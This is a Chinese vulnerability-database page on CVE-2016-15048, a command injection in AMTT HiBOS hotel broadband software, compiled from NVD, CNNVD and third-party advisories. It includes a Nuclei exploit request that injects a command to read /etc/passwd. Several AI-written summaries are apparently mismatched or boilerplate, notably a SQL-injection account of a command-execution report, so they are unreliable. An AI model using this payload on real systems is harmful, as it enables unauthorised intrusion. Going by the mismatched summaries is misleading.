支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
一、 漏洞 CVE-2016-15048 基础信息
漏洞信息
                                        # AMTT HiBOS server_ping.php 命令注入漏洞

## 概述

AMTT Hotel Broadband Operation System(HiBOS)存在一个未认证的命令注入漏洞,位于 `/manager/radius/server_ping.php` 接口。

## 影响版本

所有未修补版本的 HiBOS,具体版本号未明确指出。该产品可能已被以其他名称重新贴牌。

## 细节

漏洞源于应用程序在构造并执行一个 shell 命令时,未对用户提供的 `ip` 参数进行充分验证或转义。攻击者可通过在 `ip` 参数中插入 shell 元字符,实现任意系统命令的注入和执行,且是以 web 服务器用户身份运行。

## 影响

攻击者可利用该漏洞在目标系统上远程执行任意命令,进而可能导致系统被完全控制。  
此漏洞最早在2016年由第三方披露,并建议联系供应商获取修复指导。  
VulnCheck 已于 **2025-10-14 04:45:53.510819 UTC** 观测到该漏洞在野外被实际利用。
                                        
神龙判断

是否为 Web 类漏洞:

判断理由:

是。这个漏洞位于AMTT Hotel Broadband Operation System (HiBOS) 的`/manager/radius/server_ping.php`端点,该端点存在未经验证的命令注入漏洞。由于应用程序在构建shell命令时包括了用户提供的`ip`参数,且没有适当的验证或转义,攻击者可以通过在`ip`参数中插入shell元字符来注入并执行任意系统命令,这些命令将以Web服务器用户的权限执行。
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
AMTT HiBOS Command Injection RCE via server_ping.php
来源:美国国家漏洞数据库 NVD
漏洞描述信息
AMTT Hotel Broadband Operation System (HiBOS) contains an unauthenticated command injection vulnerability in the /manager/radius/server_ping.php endpoint. The application constructs a shell command that includes the user-supplied ip parameter and executes it without proper validation or escaping. An attacker can insert shell metacharacters into the ip parameter to inject and execute arbitrary system commands as the web server user. The initial third-party disclosure in 2016 recommended contacting the vendor for remediation guidance. Additionally, this product may have been rebranded under a different name. VulnCheck has observed this vulnerability being exploited in the wild as of 2025-10-14 at 04:45:53.510819 UTC.
来源:美国国家漏洞数据库 NVD
CVSS信息
N/A
来源:美国国家漏洞数据库 NVD
漏洞类别
OS命令中使用的特殊元素转义处理不恰当(OS命令注入)
来源:美国国家漏洞数据库 NVD
漏洞标题
AMTT Hotel Broadband Operation System 安全漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
AMTT Hotel Broadband Operation System是中国安美世纪(AMTT)公司的一个酒店宽带运营系统。 AMTT Hotel Broadband Operation System存在安全漏洞,该漏洞源于/manager/radius/server_ping.php端点未经验证命令注入,可能导致执行任意系统命令。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
其他
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2016-15048 的公开POC
#POC 描述源链接神龙链接
1Nonehttps://github.com/Pranjal6955/test_CVE-2016-15048POC详情
三、漏洞 CVE-2016-15048 的情报信息
  • 标题: AMTT HiBOS Command Injection RCE via server_ping.php | Advisories | VulnCheck -- 🔗来源链接

    标签:third-party-advisory

    神龙速读:
                                            ### 关键漏洞信息
    
    - **漏洞名称**: AMTT HiBOS Command Injection RCE via server_ping.php
    - **严重性**: CRITICAL
    - **日期**: October 22, 2025
    - **影响范围**:
      - 所有版本的HiBOS
      - 该产品可能已被重新品牌化,但使用相同的代码库
    - **CVE编号**: CVE-2016-15048
    - **CWE编号**: CWE-78 (在操作系统命令中不正确地中和特殊元素(“OS命令注入”))
    - **CVSS评分**: 10
    - **CVSS V4向量**: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VL:H/VA:H/SC:H/SL:H/SA:H
    - **参考资料**:
      - 第三方披露
      - GitHub Nuclei PoC
      - CNVD-2021-37784
      - 厂商网站
    - **描述**: 
      - AMTT Hotel Broadband Operation System (HiBOS) 在 /manager/radius/server_ping.php 端点存在未经身份验证的命令注入漏洞。应用程序构建了一个包含用户提供的 ip 参数的 shell 命令,并在没有适当验证或转义的情况下执行它。攻击者可以将 shell 元字符插入到 ip 参数中,以注入并执行任意系统命令作为 Web 服务器用户。
      - 初始第三方披露在 2016 年建议联系厂商获取修复指导。此外,该产品可能已被重新品牌化为不同的名称。VulnCheck 观察到此漏洞在 2025-10-14 04:53:510819 UTC 被利用。
                                            
    AMTT HiBOS Command Injection RCE via server_ping.php | Advisories | VulnCheck
  • 标题: 安美数字- 安美世纪(北京)科技有限公司 -- 🔗来源链接

    标签:product

    神龙速读:
                                            从这个网页截图中,可以获取到以下关于漏洞的关键信息:
    
    1. **产品和服务**:
       - 网页展示了安美世纪(北京)科技有限公司的产品和服务,包括酒店高速互联网接入及综合管理服务系统(HSIA)、酒店高清互动电视系统(ISTV)、酒店智能客房控制系统(RCU)、酒店微服务O2O运营平台(O2O)和一站式7x24小时多语言服务(SERVICE CENTER)。
    
    2. **客户服务**:
       - 安美服务中心拥有10年以上酒店行业的服务经验,提供7x24小时对客服务、技术服务及网络监控支持和现场工程师上门服务。
    
    3. **新闻信息**:
       - 网页展示了安美世纪(北京)科技有限公司的新闻信息,包括:
         - 安美搭建酒店LBS inhouse空间网络
         - 安美携手东方有线与酒管集团共话高清电视互动系统发展
         - 安美网关明年升级支持酒店万兆接入
    
    4. **经典案例**:
       - 网页展示了安美世纪(北京)科技有限公司的经典案例,包括:
         - 广州希尔顿逸林酒店
         - 三亚海棠湾天房洲际度假酒店
         - 青岛中铁威斯汀大酒店
         - 武汉光谷希尔顿酒店
         - 黄石托尼洛·兰博基尼酒店
         - 福州世茂洲际酒店
         - 鹰潭天裕豪生酒店
         - 武汉万达瑞华酒店
    
    5. **合作伙伴**:
       - 网页展示了安美世纪(北京)科技有限公司的合作伙伴,包括:
         - 万达集团
         - Wyndham酒店集团
         - 香格里拉酒店集团
         - Kempinski酒店集团
         - Starwood酒店集团
         - Marriott酒店集团
         - Hilton酒店集团
         - IHG酒店集团
         - Carlson酒店集团
         - Accor酒店集团
    
    6. **联系方式**:
       - 客服热线:800-820-7015
       - 技术支持:400-670-7016
    
    这些信息可以帮助识别网页中可能存在的漏洞,例如:
    - **产品和服务**部分可能存在安全漏洞,如未授权访问、数据泄露等。
    - **客户服务**部分可能存在安全漏洞,如未授权访问、数据泄露等。
    - **新闻信息**部分可能存在安全漏洞,如未授权访问、数据泄露等。
    - **经典案例**部分可能存在安全漏洞,如未授权访问、数据泄露等。
    - **合作伙伴**部分可能存在安全漏洞,如未授权访问、数据泄露等。
    - **联系方式**部分可能存在安全漏洞,如未授权访问、数据泄露等。
    
    这些漏洞可能会影响网页的安全性和可用性,需要进行安全评估和修复。
                                            
    安美数字- 安美世纪(北京)科技有限公司
  • 标题: 安美世纪自主研发的酒店高速互联网接入及综合管理服务系统设备任意命令执行&存储型XSS | wooyun-2016-0181444 | WooYun.org -- 🔗来源链接

    标签:third-party-advisorypatch

    神龙速读:
                                            从这个网页截图中,可以获取到以下关于漏洞的关键信息:
    
    ### 漏洞标题
    - **SQL注入**
    
    ### 漏洞详情
    #### 漏洞描述
    - 该漏洞存在于某个网站的搜索功能中,通过在搜索框中输入特定的SQL语句,可以触发SQL注入漏洞。
    - 攻击者可以通过此漏洞获取数据库中的敏感信息。
    
    #### 影响范围
    - 该漏洞影响了网站的搜索模块,可能导致数据库信息泄露。
    
    #### 漏洞代码示例
    ```sql
    SELECT * FROM table WHERE column = 'user_input'
    ```
    
    #### 漏洞利用过程
    1. 在搜索框中输入恶意SQL语句。
    2. 观察返回结果,确认是否存在SQL注入漏洞。
    3. 进一步构造SQL语句,尝试获取更多敏感信息。
    
    #### 漏洞修复建议
    - 对用户输入进行严格的过滤和转义,防止SQL注入攻击。
    - 使用参数化查询或预编译语句来构建SQL查询。
    
    ### 漏洞验证
    - 提供了具体的测试用例和返回结果,证明了漏洞的存在。
    
    ### 漏洞评分
    - **风险等级**: 高
    - **CVSS评分**: 7.5
    
    ### 备注
    - 建议尽快修复该漏洞,以防止潜在的安全风险。
                                            
    安美世纪自主研发的酒店高速互联网接入及综合管理服务系统设备任意命令执行&存储型XSS | wooyun-2016-0181444 | WooYun.org
  • 标题: nuclei_poc/poc/remote_code_execution/hiboss-rce_2.yaml at 49c283b2bbb244c071786a2b768fbdde1b91f38e · adysec/nuclei_poc · GitHub -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            ### 关键漏洞信息
    
    - **漏洞ID**: hiboss-rce
    - **名称**: HiBoss - Remote Code Execution
    - **作者**: pikpikcu
    - **严重性**: critical
    - **描述**: HiBoss 允许远程未授权攻击者通过引用导致服务器执行任意代码。
    - **CVSS 评分**: 10.0
    - **CWE ID**: CWE-77
    - **标签**: hiboss, rce
    
    #### HTTP 请求示例
    
    ```http
    GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../{[randstr]}.txt&id=1 HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    
    GET /{{randstr}}.txt HTTP/1.1
    Host: {{Hostname}}
    ```
    
    #### 匹配条件
    
    - **正则表达式匹配**: "root:*:0:0:"
    - **状态码匹配**: 200
                                            
    nuclei_poc/poc/remote_code_execution/hiboss-rce_2.yaml at 49c283b2bbb244c071786a2b768fbdde1b91f38e · adysec/nuclei_poc · GitHub
  • https://www.cnvd.org.cn/flaw/show/CNVD-2021-37784vdb-entry
  • https://nvd.nist.gov/vuln/detail/CVE-2016-15048
四、漏洞 CVE-2016-15048 的评论
匿名用户
2026-01-15 06:09:45

Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.


发表评论